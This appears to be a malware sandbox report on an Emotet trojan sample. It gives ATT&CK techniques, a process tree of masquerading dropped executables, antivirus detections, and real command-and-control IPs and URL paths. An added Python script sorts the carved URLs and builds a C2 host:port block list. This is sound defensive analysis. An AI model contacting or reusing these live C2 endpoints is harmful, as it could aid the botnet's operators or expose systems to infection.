                      Source: Yara match | File source: 1.2.MV9tCJw8Xr.exe.21c4000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.KBDHEB.exe.5b1f3f.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 29.2.KBDINTAM.exe.185052e.3.raw.unpack, type: UNPACKEDPE
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe | Code function: 22_2_00A413C0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,

                      Mitre Att&ck Matrix

                      Techniques per tactic column (the digits the report attaches to a technique are kept in parentheses):

                      Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
                      Execution: Windows Management Instrumentation (1), Native API (1), Command and Scripting Interpreter (2), Service Execution (11), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript
                      Persistence: DLL Side-Loading (1), Application Shimming (1), Windows Service (12), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows)
                      Privilege Escalation: DLL Side-Loading (1), Application Shimming (1), Windows Service (12), Process Injection (11), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows)
                      Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (1), DLL Side-Loading (1), File Deletion (1), Masquerading (12), Virtualization/Sandbox Evasion (3), Process Injection (11), Hidden Files and Directories (1)
                      Credential Access: Input Capture (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
                      Discovery: System Time Discovery (2), System Service Discovery (1), File and Directory Discovery (2), System Information Discovery (45), Security Software Discovery (161), Virtualization/Sandbox Evasion (3), Process Discovery (2), Application Window Discovery (1), Remote System Discovery (1), Process Discovery
                      Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content
                      Collection: Archive Collected Data (1), Input Capture (2), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
                      Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
                      Command and Control: Ingress Tool Transfer (1), Encrypted Channel (2), Non-Standard Port (1), Non-Application Layer Protocol (1), Application Layer Protocol (111), Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
                      Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
                      Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
                      Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact

                      Behavior Graph

                      Behavior Graph ID: 356776 | Sample: MV9tCJw8Xr | Start date: 23/02/2021 | Architecture: WINDOWS | Score: 100

                      Network contacts attributed to the sample as a whole: 177.130.51.198 (WspServicosdeTelecomunicacoesLtdaBR, Brazil); 110.37.224.243 (WATEEN-IMS-PK-AS-AP NationalWiMAXIMSenvironmentPK, Pakistan); 92 other IPs or domains
                      Signatures attributed to the sample as a whole: Found malware configuration; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 2 other signatures

                      Process tree (an arrow marks a started process; signatures, dropped files and network contacts are listed under the process the graph attributes them to):

                      MV9tCJw8Xr.exe
                          Signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
                          -> KBDHEB.exe
                              Network: 190.144.18.198 port 80 (TelmexColombiaSACO, Colombia); 87.106.136.232 ports 49742, 8080 (ONEANDONE-ASBrauerstrasse48DE, Germany); 2 other IPs or domains
                              Dropped: C:\Windows\SysWOW64\...\tokenbinding2.exe (PE32)
                              Signatures: Drops executables to the windows directory (C:\Windows) and starts them
                              -> tokenbinding2.exe
                                  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Drops executables to the windows directory (C:\Windows) and starts them; Hides that the sample has been downloaded from the Internet (zone.identifier)
                                  -> KBDHEB.exe -> execmodelproxy.exe -> COLORCNV.exe -> usp10.exe -> KBDINTAM.exe -> msrd2x40.exe -> MCCSEngineShared.exe
                                      Network (second KBDHEB.exe instance): 192.168.2.1
                                      Signatures (each process in this chain): Drops executables to the windows directory (C:\Windows) and starts them; Hides that the sample has been downloaded from the Internet (zone.identifier)
                      svchost.exe
                          Signatures: Changes security center settings (notifications, updates, antivirus, firewall)
                          -> MpCmdRun.exe
                              -> conhost.exe
                      svchost.exe
                          Network: 127.0.0.1
                      8 other processes

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      MV9tCJw8Xr.exe | 66% | Virustotal |
                      MV9tCJw8Xr.exe | 62% | Metadefender |
                      MV9tCJw8Xr.exe | 77% | ReversingLabs | Win32.Trojan.Emotet
                      MV9tCJw8Xr.exe | 100% | Avira | HEUR/AGEN.1137653

                      Dropped Files

                      Source | Detection | Scanner | Label
                      C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe | 100% | Joe Sandbox ML |
                      C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe | 59% | Metadefender |
                      C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe | 93% | ReversingLabs | Win32.Trojan.Emotet

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      32.2.jscript9.exe.298052e.3.unpack | 100% | Avira | HEUR/AGEN.1110377
                      30.2.msrd2x40.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      22.2.tokenbinding2.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      32.2.jscript9.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      2.2.KBDHEB.exe.5b053f.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
                      37.2.catsrvut.exe.2ae279e.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      29.2.KBDINTAM.exe.185279e.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      27.2.COLORCNV.exe.135052e.3.unpack | 100% | Avira | HEUR/AGEN.1110377
                      31.2.MCCSEngineShared.exe.28b279e.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      29.2.KBDINTAM.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      30.2.msrd2x40.exe.131052e.2.unpack | 100% | Avira | HEUR/AGEN.1110377
                      34.2.wmvdspa.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      1.2.MV9tCJw8Xr.exe.218053f.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
                      36.2.msvcr100_clr0400.exe.2670000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      26.2.execmodelproxy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      28.2.usp10.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      32.2.jscript9.exe.298279e.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      34.2.wmvdspa.exe.31b279e.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      26.2.execmodelproxy.exe.2c7052e.2.unpack | 100% | Avira | HEUR/AGEN.1110377
                      31.2.MCCSEngineShared.exe.2970000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      23.2.KBDHEB.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      30.2.msrd2x40.exe.131279e.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      1.2.MV9tCJw8Xr.exe.2181f3f.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      28.2.usp10.exe.2e3279e.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      2.2.KBDHEB.exe.21d0000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      27.2.COLORCNV.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      23.2.KBDHEB.exe.2b6052e.2.unpack | 100% | Avira | HEUR/AGEN.1110377
                      1.2.MV9tCJw8Xr.exe.21e0000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      27.2.COLORCNV.exe.135279e.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      34.2.wmvdspa.exe.31b052e.2.unpack | 100% | Avira | HEUR/AGEN.1110377
                      26.2.execmodelproxy.exe.2c7279e.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      37.2.catsrvut.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      23.2.KBDHEB.exe.2b6279e.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      36.2.msvcr100_clr0400.exe.25b052e.2.unpack | 100% | Avira | HEUR/AGEN.1110377
                      37.2.catsrvut.exe.2ae052e.2.unpack | 100% | Avira | HEUR/AGEN.1110377
                      28.2.usp10.exe.2e3052e.2.unpack | 100% | Avira | HEUR/AGEN.1110377
                      22.2.tokenbinding2.exe.2eb052e.2.unpack | 100% | Avira | HEUR/AGEN.1110377
                      36.2.msvcr100_clr0400.exe.25b279e.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      31.2.MCCSEngineShared.exe.28b052e.2.unpack | 100% | Avira | HEUR/AGEN.1110377
                      2.2.KBDHEB.exe.20c4000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      29.2.KBDINTAM.exe.185052e.3.unpack | 100% | Avira | HEUR/AGEN.1110377
                      22.2.tokenbinding2.exe.2eb279e.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      2.2.KBDHEB.exe.5b1f3f.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      1.2.MV9tCJw8Xr.exe.21c4000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                      Domains

                      No Antivirus matches

                      URLs

                      Source | Detection | Scanner | Label
                      http://190.144.18.198/7I6ErDP3TXIbpPVjGt/ | 0% | Avira URL Cloud | safe
                      http://87.106.139.101:8080/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/_o | 0% | Avira URL Cloud | safe
                      http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/ | 0% | Avira URL Cloud | safe
                      http://190.144.18.198/7I6ErDP3TXIbpPVjGt/oM | 0% | Avira URL Cloud | safe
                      http://87.106.139.101:8080/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJj | 0% | Avira URL Cloud | safe
                      http://79.143.178.194:8080/OBOuz0RiXji/d5wQYa4TTiE8mhM/tWmQkXn/eT4anGr2w20EB/5Z2vttar3W/LDWHDNq9fsv2 | 0% | Avira URL Cloud | safe
                      http://87.106.139.101:8080/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/ | 0% | Avira URL Cloud | safe
                      http://87.106.139.101:8080/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/ | 0% | Avira URL Cloud | safe
                      http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/l | 0% | Avira URL Cloud | safe
                      http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/e | 0% | Avira URL Cloud | safe
                      http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/u | 0% | Avira URL Cloud | safe
                      http://87.10AA | 0% | Avira URL Cloud | safe
                      http://87.10A | 0% | Avira URL Cloud | safe
                      https://dynamic.t | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      Name | Malicious | Antivirus Detection | Reputation
                      http://87.106.139.101:8080/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/ | false | Avira URL Cloud: safe | unknown
                      http://87.106.139.101:8080/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/ | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://190.144.18.198/7I6ErDP3TXIbpPVjGt/ | KBDHEB.exe, 00000002.00000002.410251484.0000000002396000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://t0.tiles.ditu.live.com/tiles/gen19 | svchost.exe, 00000009.00000003.305999257.000001BC4BC41000.00000004.00000001.sdmp | false | none | high
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmp | false | none | high
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | false | none | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmp | false | none | high
http://87.106.139.101:8080/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/_o | KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://corp.roblox.com/contact/ | svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp; svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmp | false | none | high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/ | svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmp | false | none | high
http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/ | KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | false | none | high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 00000009.00000003.305999257.000001BC4BC41000.00000004.00000001.sdmp | false | none | high
http://190.144.18.198/7I6ErDP3TXIbpPVjGt/oM | KBDHEB.exe, 00000002.00000002.410251484.0000000002396000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.hulu.com/ca-privacy-rights | svchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmp | false | none | high
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | false | none | high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000009.00000003.305925778.000001BC4BC5A000.00000004.00000001.sdmp | false | none | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmp | false | none | high
http://www.g5e.com/G5_End_User_License_Supplemental_Terms | svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmp; svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmp; svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmp | false | none | high
http://87.106.139.101:8080/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJj | KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000009.00000003.305999257.000001BC4BC41000.00000004.00000001.sdmp | false | none | high
http://79.143.178.194:8080/OBOuz0RiXji/d5wQYa4TTiE8mhM/tWmQkXn/eT4anGr2w20EB/5Z2vttar3W/LDWHDNq9fsv2 | KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hulu.com/terms | svchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmp | false | none | high
https://appexmapsappupdate.blob.core.windows.net | svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | false | none | high
https://en.help.roblox.com/hc/en-us | svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp; svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmp | false | none | high
http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/l | KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bingmapsportal.com | svchost.exe, 00000009.00000002.306308761.000001BC4BC13000.00000004.00000001.sdmp | false | none | high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmp | false | none | high
http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/e | KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | false | none | high
https://www.hulu.com/do-not-sell-my-info | svchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmp | false | none | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 00000009.00000003.305990184.000001BC4BC56000.00000004.00000001.sdmp | false | none | high
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmp | false | none | high
https://www.roblox.com/develop | svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp; svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmp | false | none | high
http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/u | KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://instagram.com/hiddencity_ | svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmp; svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmp; svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmp | false | none | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmp | false | none | high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmp | false | none | high
https://corp.roblox.com/parents/ | svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp; svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmp; svchost.exe, 00000014.00000003.399513122.000002847D761000.00000004.00000001.sdmp | false | none | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmp; svchost.exe, 00000009.00000002.306308761.000001BC4BC13000.00000004.00000001.sdmp | false | none | high
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 00000009.00000003.305911439.000001BC4BC47000.00000004.00000001.sdmp | false | none | high
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | false | none | high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmp | false | none | high
http://87.10AA | KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | false | none | high
http://87.10A | KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.hulu.com/privacy | svchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmp | false | none | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmp | false | none | high
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmp | false | none | high
https://dynamic.t | svchost.exe, 00000009.00000002.306408621.000001BC4BC62000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | false | none | high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmp | false | none | high
https://www.roblox.com/info/privacy | svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp; svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmp | false | none | high
http://www.g5e.com/termsofservice | svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmp; svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmp; svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmp | false | none | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmp | false | none | high
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | false | none | high
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmp | false | none | high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 00000009.00000003.305925778.000001BC4BC5A000.00000004.00000001.sdmp | false | none | high
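The memory-string table above mixes two very different populations: URLs carved from KBDHEB.exe (bare IP hosts, port 8080, long mixed-case path segments, and a few cut-off strings such as http://87.10AA) and URLs carved from svchost.exe (Bing Maps, Roblox, Hulu strings that belong to ordinary Windows components). The "Avira URL Cloud: safe" verdict on the IP-literal URLs only says the cloud has no record of those freshly generated paths; it is not evidence of benignity. The script below is an added example, not part of the report or of any sandbox vendor's tooling: it takes (URL, source) rows copied from the table, merges duplicates, and applies a triage heuristic of the editor's own design (IP-literal host on a non-default port or with random-looking path segments is a C2 candidate; a host that is neither an IP nor a plausible FQDN is a string fragment, not an IOC) before emitting a host:port deny list. The sample rows are a constructed subset of the table.

```python
"""Triage 'URLs from Memory and Binaries' rows from a sandbox report.

Added example, not part of the report. Each row is (url, source) as the
report lists it: the source is the process the string was carved from,
followed by the memory-dump identifier. The heuristic is the editor's own.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample: a subset of the rows in the table above.
ROWS = [
    ("http://87.106.139.101:8080/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/_o",
     "KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp"),
    ("http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/",
     "KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp"),
    ("http://190.144.18.198/7I6ErDP3TXIbpPVjGt/oM",
     "KBDHEB.exe, 00000002.00000002.410251484.0000000002396000.00000004.00000001.sdmp"),
    ("http://87.10AA",
     "KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp"),
    ("https://dynamic.t",
     "svchost.exe, 00000009.00000002.306408621.000001BC4BC62000.00000004.00000001.sdmp"),
    ("https://dev.virtualearth.net/REST/v1/Routes/Driving",
     "svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp"),
    ("https://www.roblox.com/develop",
     "svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp"),
]

DEFAULT_PORTS = {"http": 80, "https": 443}
# A complete host name: dotted labels ending in an alphabetic TLD of 2+ chars.
HOSTNAME = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$")


def parse_source(source):
    """'KBDHEB.exe, 00000002....sdmp' -> ('KBDHEB.exe', '00000002....sdmp')."""
    proc, _, dump = source.partition(",")
    return proc.strip(), dump.strip()


def _random_like(segment):
    """Mixed-case alphanumeric path segment of 5+ chars, e.g. 'LrBFYD0XkeH6Uxd'."""
    return (len(segment) >= 5
            and any(c.isdigit() for c in segment)
            and any(c.islower() for c in segment)
            and any(c.isupper() for c in segment))


def classify(url):
    """Extract the features the triage rule scores."""
    parts = urlsplit(url)
    host = parts.hostname or ""          # urlsplit lowercases the host
    try:
        ipaddress.ip_address(host)
        ip_literal = True
    except ValueError:
        ip_literal = False
    port = parts.port or DEFAULT_PORTS.get(parts.scheme)
    segments = [s for s in parts.path.split("/") if s]
    return {
        "host": host,
        "port": port,
        "ip_literal": ip_literal,
        "nonstandard_port": port != DEFAULT_PORTS.get(parts.scheme),
        "random_segments": sum(1 for s in segments if _random_like(s)),
        # Neither an IP nor a plausible FQDN: a cut-off string, not an IOC.
        "fragment": not ip_literal and not HOSTNAME.match(host),
    }


def triage(rows):
    """Merge duplicate URLs, score each, return (c2_candidates, other, fragments)."""
    merged = {}
    for url, source in rows:
        proc, dump = parse_source(source)
        e = merged.setdefault(url, {"url": url, "processes": set(), "dumps": set()})
        e["processes"].add(proc)
        e["dumps"].add(dump)
    c2, other, fragments = [], [], []
    for e in merged.values():
        e.update(classify(e["url"]))
        if e["fragment"]:
            fragments.append(e)
        elif e["ip_literal"] and (e["nonstandard_port"] or e["random_segments"]):
            c2.append(e)
        else:
            other.append(e)
    return c2, other, fragments


def blocklist(entries):
    """Unique 'host:port' pairs, sorted, for a firewall or proxy deny list."""
    return sorted({f'{e["host"]}:{e["port"]}' for e in entries})


if __name__ == "__main__":
    c2, other, fragments = triage(ROWS)
    for e in c2:
        print("C2 candidate:", e["url"], "from", ",".join(sorted(e["processes"])))
    print("blocklist:", blocklist(c2))
    print("fragments (not IOCs):", [e["url"] for e in fragments])
```

Cross-check each candidate host against the Contacted IPs table before acting on it, and keep the full URL prefix (host, port and first path segment) as the indicator rather than the host alone: the same host appears with several path variants in memory, and only two of them show up under Contacted URLs as actually requested.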

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
126.126.139.26 | unknown | Japan | 17676 | GIGAINFRASoftbankBBCorpJP | true
183.91.3.63 | unknown | Viet Nam | 45903 | CMCTELECOM-AS-VNCMCTelecomInfrastructureCompanyVN | true
153.204.122.254 | unknown | Japan | 4713 | OCNNTTCommunicationsCorporationJP | true
203.153.216.178 | unknown | Indonesia | 45291 | SURF-IDPTSurfindoNetworkID | true
78.90.78.210 | unknown | Bulgaria | 35141 | MEGALANBG | true
143.95.101.72 | unknown | United States | 62729 | ASMALLORANGE1US | true
162.144.145.58 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | true
190.164.135.81 | unknown | Chile | 22047 | VTRBANDAANCHASACL | true
45.239.204.100 | unknown | Brazil | 268405 | BMOBUENOCOMUNICACOES-MEBR | true
190.85.46.52 | unknown | Colombia | 14080 | TelmexColombiaSACO | true
197.221.227.78 | unknown | Zimbabwe | 37204 | TELONEZW | true
190.194.12.132 | unknown | Argentina | 10481 | TelecomArgentinaSAAR | true
181.59.59.54 | unknown | Colombia | 10620 | TelmexColombiaSACO | true
5.2.246.108 | unknown | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | true
103.80.51.61 | unknown | Thailand | 136023 | PTE-AS-APPTEGroupCoLtdTH | true
87.106.139.101 | unknown | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
